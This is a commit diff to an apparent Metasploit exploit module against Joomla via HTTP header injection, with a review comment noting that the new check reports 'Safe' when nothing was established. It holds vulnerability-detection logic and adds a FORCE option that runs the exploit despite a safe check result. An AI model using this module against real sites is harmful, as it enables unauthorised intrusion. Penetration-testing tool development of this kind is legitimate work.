implement @wchen-r7 's suggestions
parent
b43d580276
commit
76438dfb2f
|
@ -6,7 +6,7 @@
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GoodRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
@ -51,6 +51,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
OptString.new('TARGETURI', [ true, 'The path to joomla', '/' ]),
|
OptString.new('TARGETURI', [ true, 'The path to joomla', '/' ]),
|
||||||
OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])
|
OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])
|
||||||
], self.class)
|
], self.class)
|
||||||
|
|
||||||
|
register_advanced_options(
|
||||||
|
[
|
||||||
|
OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),
|
||||||
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
@ -80,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog
|
# http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog
|
||||||
if rest && rest.include?('ubuntu')
|
if rest && rest.include?('ubuntu')
|
||||||
sub_version = rest.scan(/^\dubuntu([\d\.]+)/i).flatten.first || ''
|
sub_version = rest.scan(/^\dubuntu([\d\.]+)/i).flatten.first || ''
|
||||||
vprint_status("Found Ubuntu PHP version: #{res.headers['X-Powered-By']}")
|
vprint_status("Found Ubuntu PHP version #{res.headers['X-Powered-By']}")
|
||||||
|
|
||||||
if version > Gem::Version.new('5.5.9')
|
if version > Gem::Version.new('5.5.9')
|
||||||
vulnerable = false
|
vulnerable = false
|
||||||
|
@ -93,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
elsif rest && rest.include?('+deb')
|
elsif rest && rest.include?('+deb')
|
||||||
sub_version = rest.scan(/^\d+\+deb([\du]+)/i).flatten.first || ''
|
sub_version = rest.scan(/^\d+\+deb([\du]+)/i).flatten.first || ''
|
||||||
vprint_status("Found Debian PHP version: #{res.headers['X-Powered-By']}")
|
vprint_status("Found Debian PHP version #{res.headers['X-Powered-By']}")
|
||||||
|
|
||||||
if version > Gem::Version.new('5.4.45')
|
if version > Gem::Version.new('5.4.45')
|
||||||
vulnerable = false
|
vulnerable = false
|
||||||
|
@ -103,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
vulnerable = true
|
vulnerable = true
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
vprint_status("Found PHP version: #{res.headers['X-Powered-By']}")
|
vprint_status("Found PHP version #{res.headers['X-Powered-By']}")
|
||||||
vulnerable = true if version <= Gem::Version.new('5.4.44')
|
vulnerable = true if version <= Gem::Version.new('5.4.44')
|
||||||
vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))
|
vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))
|
||||||
vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))
|
vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))
|
||||||
|
@ -117,8 +122,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') })
|
res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') })
|
||||||
if res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>')
|
if res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>')
|
||||||
joomla_version = res.body.scan(/<version>([\d\.]+)<\/version>/i).flatten.first || ''
|
joomla_version = res.body.scan(/<version>([\d\.]+)<\/version>/i).flatten.first || ''
|
||||||
if joomla_version
|
unless joomla_version.empty?
|
||||||
return Exploit::CheckCode::Vulnerable if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6')
|
vprint_status("Detected Joomla version #{joomla_version}")
|
||||||
|
return Exploit::CheckCode::Appears if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6')
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -131,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
Exploit::CheckCode::Unknown
|
Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
|
|
||||||
def get_payload
|
def get_payload
|
||||||
|
@ -152,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
if check == Exploit::CheckCode::Safe
|
if check == Exploit::CheckCode::Safe && datastore['FORCE'] == false
|
||||||
print_error('Target seems safe, so we will not continue.')
|
print_error('Target seems safe, so we will not continue.')
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
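Review bot: The last line of `check` now returns `Exploit::CheckCode::Safe` for every path that did not return earlier, and in the visible lines that includes a failed or non-200 request for `joomla.xml` and an empty `joomla_version`, where nothing about the target was actually established. Reporting Safe in those cases gives false assurance to anyone who reads the check result as an assessment finding. I would keep the final fall-through as `Exploit::CheckCode::Unknown` and add an explicit `return Exploit::CheckCode::Safe` only on the path where a version was parsed and compared against the fixed release. Part of `check` lies between the hunks and is not shown, so confirm the hidden lines do not already separate these cases. A smaller style point in `exploit`: `datastore['FORCE'] == false` reads more simply as `!datastore['FORCE']`.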
|
|